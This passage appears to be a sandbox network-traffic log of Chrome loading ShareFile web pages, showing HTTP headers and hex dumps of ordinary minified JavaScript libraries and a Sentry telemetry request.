                                                                                                                                                                                                                                                                                Data Ascii: ace(/\*/g,"%2A")}i._parts=function(){return{protocol:null,username:null,password:null,hostname:null,urn:null,port:null,path:null,query:null,fragment:null,preventInvalidHostname:i.preventInvalidHostname,duplicateQueryParameters:i.duplicateQueryParameters,e
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC15846INData Raw: 68 61 6e 20 5b 41 2d 5a 30 2d 39 2e 2d 5d 27 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 62 75 69 6c 64 28 21 74 29 2c 74 68 69 73 7d 2c 61 2e 75 73 65 72 69 6e 66 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 75 72 6e 29 72 65 74 75 72 6e 20 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 22 22 3a 74 68 69 73 3b 69 66 28 65 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 6e 3d 69 2e 62 75 69 6c 64 55 73 65 72 69 6e 66 6f 28 74 68 69 73 2e 5f 70 61 72 74 73 29 3b 72 65 74 75 72 6e 20 6e 3f 6e 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 6e 2e 6c 65 6e 67 74 68 2d 31 29 3a 6e 7d 72 65 74 75 72 6e 22 40 22 21 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 28 65 2b 3d 22 40 22 29 2c 69 2e 70 61 72 73 65 55 73 65 72
                                                                                                                                                                                                                                                                                Data Ascii: han [A-Z0-9.-]');return this.build(!t),this},a.userinfo=function(e,t){if(this._parts.urn)return e===undefined?"":this;if(e===undefined){var n=i.buildUserinfo(this._parts);return n?n.substring(0,n.length-1):n}return"@"!==e[e.length-1]&&(e+="@"),i.parseUser
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 6f 70 65 72 74 79 28 65 2c 28 30 2c 72 2e 5a 29 28 6f 2e 6b 65 79 29 2c 6f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 74 26 26 6f 28 65 2e 70 72 6f 74 6f 74 79 70 65 2c 74 29 2c 6e 26 26 6f 28 65 2c 6e 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 70 72 6f 74 6f 74 79 70 65 22 2c 7b 77 72 69 74 61 62 6c 65 3a 21 31 7d 29 2c 65 7d 7d 2c 34 39 34 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 34 39 31 34 32 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 28 74 3d 28 30 2c 72 2e 5a 29 28 74 29 29 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50
                                                                                                                                                                                                                                                                                Data Ascii: operty(e,(0,r.Z)(o.key),o)}}function i(e,t,n){return t&&o(e.prototype,t),n&&o(e,n),Object.defineProperty(e,"prototype",{writable:!1}),e}},4942:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var r=n(49142);function o(e,t,n){return(t=(0,r.Z)(t))in e?Object.defineP
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC15596INData Raw: 74 75 72 6e 20 74 2e 66 72 6f 6d 28 22 49 74 65 6d 73 22 29 2c 74 2e 61 63 74 69 6f 6e 73 28 22 43 6f 6e 74 65 6e 74 56 69 65 77 65 72 22 29 2c 74 2e 62 6f 64 79 28 65 29 2c 74 2e 6d 65 74 68 6f 64 28 22 50 4f 53 54 22 29 2c 74 7d 2c 65 2e 67 65 74 52 65 63 65 6e 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 65 77 20 6f 2e 41 45 3b 72 65 74 75 72 6e 20 65 2e 66 72 6f 6d 28 22 49 74 65 6d 73 22 29 2c 65 2e 61 63 74 69 6f 6e 73 28 22 52 65 63 65 6e 74 73 22 29 2c 65 2e 6d 65 74 68 6f 64 28 22 47 45 54 22 29 2c 65 7d 2c 65 2e 67 65 74 50 72 65 76 69 6f 75 73 52 65 63 65 6e 74 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6e 65 77 20 6f 2e 41 45 3b 72 65 74 75 72 6e 20 65 2e 66 72 6f 6d 28 22 49 74 65 6d 73 22 29 2c 65 2e 61 63 74
                                                                                                                                                                                                                                                                                Data Ascii: turn t.from("Items"),t.actions("ContentViewer"),t.body(e),t.method("POST"),t},e.getRecents=function(){var e=new o.AE;return e.from("Items"),e.actions("Recents"),e.method("GET"),e},e.getPreviousRecents=function(){var e=new o.AE;return e.from("Items"),e.act


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                25192.168.2.64974113.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC602OUTGET /sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 221391
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 04 Dec 2023 08:50:04 GMT
                                                                                                                                                                                                                                                                                ETag: "b5d95b131a56925ed34b1cf110473319"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 1ac3fd533bf6be1b511077f8b8e23bfc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: TGQvG2ZZgK25--G6Imoc_-lEMCKHKEOBy9gLINqHv7LjK6YbDD1rXQ==
                                                                                                                                                                                                                                                                                Age: 45971
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 75 73 65 72 61 63 74 69 6f 6e 73 70 69 6c 65 74 2c 7b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 3a 22 63 69 74 72 69 74 65 2d 63 69 74 72 69 78 2d 75 69 2e 6a 73 22 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 63 6f 6e 66 69 72 6d 4d 6f
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevuseractionspilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"})System.register(["@citrite/citrix-ui@25.46.0","react","react-router"],(function(e,t){var r={},n={},o={};return{setters:[function(e){r.confirmMo
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 79 70 65 6f 66 20 72 3d 3d 3d 65 7c 7c 22 61 22 2b 28 74 3c 31 3f 22 6e 20 22 3a 22 20 22 29 2b 65 7d 7d 29 29 3b 76 61 72 20 73 3d 7b 7d 3b 69 2e 74 72 61 6e 73 69 74 69 6f 6e 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 5b 41 78 69 6f 73 20 76 22 2b 6e 2b 22 5d 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 20 6f 70 74 69 6f 6e 20 27 22 2b 65 2b 22 27 22 2b 74 2b 28 72 3f 22 2e 20 22 2b 72 3a 22 22 29 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 2c 6e 2c 61 29 7b 69 66 28 21 31 3d 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 6f 28 69 28 6e 2c 22 20 68 61 73 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 22 2b 28 74 3f 22 20 69 6e 20 22 2b 74 3a 22 22 29 29 2c 6f 2e 45 52 52 5f 44 45
                                                                                                                                                                                                                                                                                Data Ascii: ypeof r===e||"a"+(t<1?"n ":" ")+e}}));var s={};i.transitional=function(e,t,r){function i(e,t){return"[Axios v"+n+"] Transitional option '"+e+"'"+t+(r?". "+r:"")}return function(r,n,a){if(!1===e)throw new o(i(n," has been removed"+(t?" in "+t:"")),o.ERR_DE
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 7b 34 7d 28 28 28 3a 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 29 7b 31 2c 33 7d 29 7c 28 28 3a 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 29 3f 3a 28 28 32 35 5b 30 2d 35 5d 7c 32 5b 30 2d 34 5d 5c 64 7c 31 5c 64 5c 64 7c 5b 31 2d 39 5d 3f 5c 64 29 28 5c 2e 28 32 35 5b 30 2d 35 5d 7c 32 5b 30 2d 34 5d 5c 64 7c 31 5c 64 5c 64 7c 5b 31 2d 39 5d 3f 5c 64 29 29 7b 33 7d 29 29 7c 3a 29 29 7c 28 28 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 3a 29 7b 33 7d 28 28 28 3a 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 29 7b 31 2c 34 7d 29 7c 28 28 3a 5b 30 2d 39 41 2d 46 61 2d 66 5d 7b 31 2c 34 7d 29 7b 30 2c 32 7d 3a 28 28 32 35 5b 30 2d 35 5d 7c 32 5b 30 2d 34 5d 5c 64 7c 31 5c 64 5c 64 7c 5b 31 2d 39 5d 3f 5c 64 29 28 5c 2e 28 32 35 5b 30 2d 35
                                                                                                                                                                                                                                                                                Data Ascii: {4}(((:[0-9A-Fa-f]{1,4}){1,3})|((:[0-9A-Fa-f]{1,4})?:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}))|:))|(([0-9A-Fa-f]{1,4}:){3}(((:[0-9A-Fa-f]{1,4}){1,4})|((:[0-9A-Fa-f]{1,4}){0,2}:((25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC14808INData Raw: 61 72 41 74 28 65 2e 6c 65 6e 67 74 68 2d 31 29 26 26 28 65 2b 3d 22 2e 22 29 2c 2d 31 21 3d 3d 65 2e 69 6e 64 65 78 4f 66 28 22 3a 22 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 44 6f 6d 61 69 6e 73 20 63 61 6e 6e 6f 74 20 63 6f 6e 74 61 69 6e 20 63 6f 6c 6f 6e 73 22 29 3b 72 65 74 75 72 6e 20 65 26 26 69 2e 65 6e 73 75 72 65 56 61 6c 69 64 48 6f 73 74 6e 61 6d 65 28 65 2c 74 68 69 73 2e 5f 70 61 72 74 73 2e 70 72 6f 74 6f 63 6f 6c 29 2c 74 68 69 73 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 3d 74 68 69 73 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 73 2c 65 29 2c 74 68 69 73 2e 62 75 69 6c 64 28 21 74 29 2c 74 68 69 73 7d 2c 73 2e 64 6f 6d 61 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b
                                                                                                                                                                                                                                                                                Data Ascii: arAt(e.length-1)&&(e+="."),-1!==e.indexOf(":"))throw new TypeError("Domains cannot contain colons");return e&&i.ensureValidHostname(e,this._parts.protocol),this._parts.hostname=this._parts.hostname.replace(s,e),this.build(!t),this},s.domain=function(e,t){
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC422INData Raw: 22 22 29 7d 63 61 74 63 68 28 74 29 7b 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 3d 72 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 6f 3d 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 3f 74 3a 5f 2c 69 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6f 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 3d 6e 65 77 20 55 28 6e 7c 7c 5b 5d 29 3b 72 65 74 75 72 6e 20 61 28 69 2c 22 5f 69 6e 76 6f 6b 65 22 2c 7b 76 61 6c 75 65 3a 43 28 65 2c 72 2c 73 29 7d 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 2c 74 2c 72 29 7b 74 72 79 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 22 6e 6f 72 6d 61 6c 22 2c 61 72 67 3a 65 2e 63 61 6c 6c 28 74 2c 72 29 7d 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                                                                Data Ascii: "")}catch(t){d=function(e,t,r){return e[t]=r}}function p(e,t,r,n){var o=t&&t.prototype instanceof _?t:_,i=Object.create(o.prototype),s=new U(n||[]);return a(i,"_invoke",{value:C(e,r,s)}),i}function h(e,t,r){try{return{type:"normal",arg:e.call(t,r)}}catch(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 28 53 2c 63 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 29 29 3b 76 61 72 20 78 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 4f 3d 78 26 26 78 28 78 28 4c 28 5b 5d 29 29 29 3b 4f 26 26 4f 21 3d 3d 69 26 26 73 2e 63 61 6c 6c 28 4f 2c 63 29 26 26 28 53 3d 4f 29 3b 76 61 72 20 41 3d 6b 2e 70 72 6f 74 6f 74 79 70 65 3d 5f 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 53 29 3b 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 5b 22 6e 65 78 74 22 2c 22 74 68 72 6f 77 22 2c 22 72 65 74 75 72 6e 22 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 64 28 65 2c 74 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 6e 76 6f 6b 65 28 74 2c
                                                                                                                                                                                                                                                                                Data Ascii: (S,c,(function(){return this}));var x=Object.getPrototypeOf,O=x&&x(x(L([])));O&&O!==i&&s.call(O,c)&&(S=O);var A=k.prototype=_.prototype=Object.create(S);function P(e){["next","throw","return"].forEach((function(t){d(e,t,(function(e){return this._invoke(t,
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 61 69 6c 61 62 6c 65 3d 22 52 65 64 69 72 65 63 74 69 6f 6e 55 6e 61 76 61 69 6c 61 62 6c 65 22 7d 28 52 7c 7c 28 52 3d 7b 7d 29 29 3b 76 61 72 20 4c 3d 7b 70 72 65 52 65 71 75 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 70 6f 73 74 52 65 71 75 65 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 7d 2c 72 65 66 72 65 73 68 41 63 63 65 73 73 54 6f 6b 65 6e 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 4e 28 65 29 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4c 2c 65 29 2c 4c 2e 62 61 73 65 41 70 69 55 72 6c 26 26 21 4c 2e 62 61 73 65 41 70 69 55 72 6c 2e 65 6e 64 73 57 69 74 68 28 22 2f 22 29 26 26 28 4c 2e 62 61 73 65 41 70 69 55 72 6c 2b 3d 22 2f 22 29 7d
                                                                                                                                                                                                                                                                                Data Ascii: ailable="RedirectionUnavailable"}(R||(R={}));var L={preRequest:function(e){return e},postRequest:function(){return Promise.resolve()},refreshAccessToken:null};function N(e){Object.assign(L,e),L.baseApiUrl&&!L.baseApiUrl.endsWith("/")&&(L.baseApiUrl+="/")}
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 5d 3d 22 22 2c 65 2e 76 61 6c 75 65 3d 22 22 29 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 2c 74 29 7b 73 77 69 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 34 35 5e 47 28 65 2c 30 29 3f 28 28 28 74 3c 3c 32 5e 47 28 65 2c 30 29 29 3c 3c 32 5e 47 28 65 2c 31 29 29 3c 3c 32 5e 47 28 65 2c 32 29 29 3c 3c 32 5e 47 28 65 2c 33 29 3a 30 7d 28 65 2c 74 29 29 7b 63 61 73 65 20 35 31 30 33 3a 72 65 74 75 72 6e 20 53 65 2b 22 70 72 69 6e 74 2d 22 2b 65 2b 65 3b 63 61 73 65 20 35 37 33 37 3a 63 61 73 65 20 34 32 30 31 3a 63 61 73 65 20 33 31 37 37 3a 63 61 73 65 20 33 34 33 33 3a 63 61 73 65 20 31 36 34 31 3a 63 61 73 65 20 34 34 35 37 3a 63 61 73 65 20 32 39 32 31 3a 63 61 73 65 20 35 35 37 32 3a 63 61 73 65 20 36 33 35 36 3a 63
                                                                                                                                                                                                                                                                                Data Ascii: ]="",e.value="")}};function qe(e,t){switch(function(e,t){return 45^G(e,0)?(((t<<2^G(e,0))<<2^G(e,1))<<2^G(e,2))<<2^G(e,3):0}(e,t)){case 5103:return Se+"print-"+e+e;case 5737:case 4201:case 3177:case 3433:case 1641:case 4457:case 2921:case 5572:case 6356:c
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC16384INData Raw: 6e 5d 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 3f 72 26 26 28 65 5b 6e 5d 3d 74 5b 6e 5d 29 3a 7a 74 28 65 5b 6e 5d 2c 74 5b 6e 5d 2c 72 29 3a 65 5b 6e 5d 3d 74 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 72 65 70 6c 61 63 65 28 2f 5b 5c 2d 5c 5b 5c 5d 5c 2f 5c 7b 5c 7d 5c 28 5c 29 5c 2a 5c 2b 5c 3f 5c 2e 5c 5c 5c 5e 5c 24 5c 7c 5d 2f 67 2c 22 5c 5c 24 26 22 29 7d 76 61 72 20 42 74 3d 7b 22 26 22 3a 22 26 61 6d 70 3b 22 2c 22 3c 22 3a 22 26 6c 74 3b 22 2c 22 3e 22 3a 22 26 67 74 3b 22 2c 27 22 27 3a 22 26 71 75 6f 74 3b 22 2c 22 27 22 3a 22 26 23 33 39 3b 22 2c 22 2f 22 3a 22 26 23 78 32 46 3b 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 4d 74 28 65 29 7b 72 65 74 75 72 6e 22 73 74 72
                                                                                                                                                                                                                                                                                Data Ascii: n]instanceof String?r&&(e[n]=t[n]):zt(e[n],t[n],r):e[n]=t[n]);return e}function qt(e){return e.replace(/[\-\[\]\/\{\}\(\)\*\+\?\.\\\^\$\|]/g,"\\$&")}var Bt={"&":"&amp;","<":"&lt;",">":"&gt;",'"':"&quot;","'":"&#39;","/":"&#x2F;"};function Mt(e){return"str
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC12792INData Raw: 72 43 61 73 65 28 29 2c 32 3d 3d 3d 72 5b 31 5d 2e 6c 65 6e 67 74 68 26 26 28 72 5b 31 5d 3d 72 5b 31 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 2c 22 73 67 6e 22 21 3d 3d 72 5b 30 5d 26 26 32 3d 3d 3d 72 5b 32 5d 2e 6c 65 6e 67 74 68 26 26 28 72 5b 32 5d 3d 72 5b 32 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 2c 74 2e 69 6e 64 65 78 4f 66 28 72 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3e 2d 31 26 26 28 72 5b 31 5d 3d 72 72 28 72 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 2c 74 2e 69 6e 64 65 78 4f 66 28 72 5b 32 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3e 2d 31 26 26 28 72 5b 32 5d 3d 72 72 28 72 5b 32 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 29 2c 72 2e 6a 6f 69 6e 28 22 2d 22 29 7d 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                Data Ascii: rCase(),2===r[1].length&&(r[1]=r[1].toUpperCase()),"sgn"!==r[0]&&2===r[2].length&&(r[2]=r[2].toUpperCase()),t.indexOf(r[1].toLowerCase())>-1&&(r[1]=rr(r[1].toLowerCase())),t.indexOf(r[2].toLowerCase())>-1&&(r[2]=rr(r[2].toLowerCase()))),r.join("-")}return


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                26192.168.2.64974834.120.195.2494432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC768OUTPOST /api/4506735163932672/envelope/?sentry_key=0be0069dd70d0ce2c63c650418f56fa6&sentry_version=7&sentry_client=sentry.javascript.react%2F7.100.1 HTTP/1.1
                                                                                                                                                                                                                                                                                Host: o49063.ingest.sentry.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                Content-Length: 470
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Referer: https://premierbb.sharefile.com/
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC470OUTData Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 34 2d 31 30 2d 30 39 54 31 38 3a 30 35 3a 31 30 2e 35 32 30 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 72 65 61 63 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 37 2e 31 30 30 2e 31 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 62 66 39 33 62 30 39 33 30 64 30 61 34 30 37 39 39 30 34 33 35 61 30 34 37 30 63 39 62 62 63 34 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 34 2d 31 30 2d 30 39 54 31 38 3a 30 35 3a 31 30 2e 35 32 30 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 30 2d 30 39 54 31 38 3a 30 35 3a 31 30 2e 35 32 30 5a 22 2c 22 73 74 61 74 75
                                                                                                                                                                                                                                                                                Data Ascii: {"sent_at":"2024-10-09T18:05:10.520Z","sdk":{"name":"sentry.javascript.react","version":"7.100.1"}}{"type":"session"}{"sid":"bf93b0930d0a407990435a0470c9bbc4","init":true,"started":"2024-10-09T18:05:10.520Z","timestamp":"2024-10-09T18:05:10.520Z","statu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:12 GMT
                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                Content-Length: 2
                                                                                                                                                                                                                                                                                vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                                access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Via: 1.1 google
                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                                                                                Data Ascii: {}


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                27192.168.2.64974776.223.1.1664432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:12 UTC1026OUTGET /bundles/92fe442fb8f2d1f7093b.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
